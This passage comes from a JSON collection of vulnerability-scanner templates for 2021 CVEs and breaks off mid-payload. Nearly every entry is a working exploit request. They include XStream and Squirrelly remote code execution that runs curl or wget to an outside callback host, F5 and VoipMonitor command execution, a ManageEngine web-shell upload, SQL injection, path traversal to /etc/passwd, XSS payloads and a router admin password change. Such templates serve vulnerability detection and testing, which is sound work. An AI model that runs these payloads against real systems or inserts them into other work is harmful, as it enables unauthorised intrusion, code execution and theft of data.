&& status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"raw":["@timeout: 20s\nGET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29200","info":{"name":"Apache OFBiz < 17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-HashMap>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n            <map-Value>\n              <std-String value=\"STDSTRING\"/>\n            </map-Value>\n          </map-Entry>\n        </map-HashMap>\n     </ser>\n  </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"responseMessage\""]}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEB-INF/web.xml"],"matchers":[{"type":"dsl","internal":true,"dsl":["!contains_all(body, '</web-app>', 'java.sun.com')","!contains_all(header, 'application/xml')","status_code != 200","status_code != 404"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, '</web-app>', 'java.sun.com')","contains_all(header, 'application/xml')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Wget"]}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0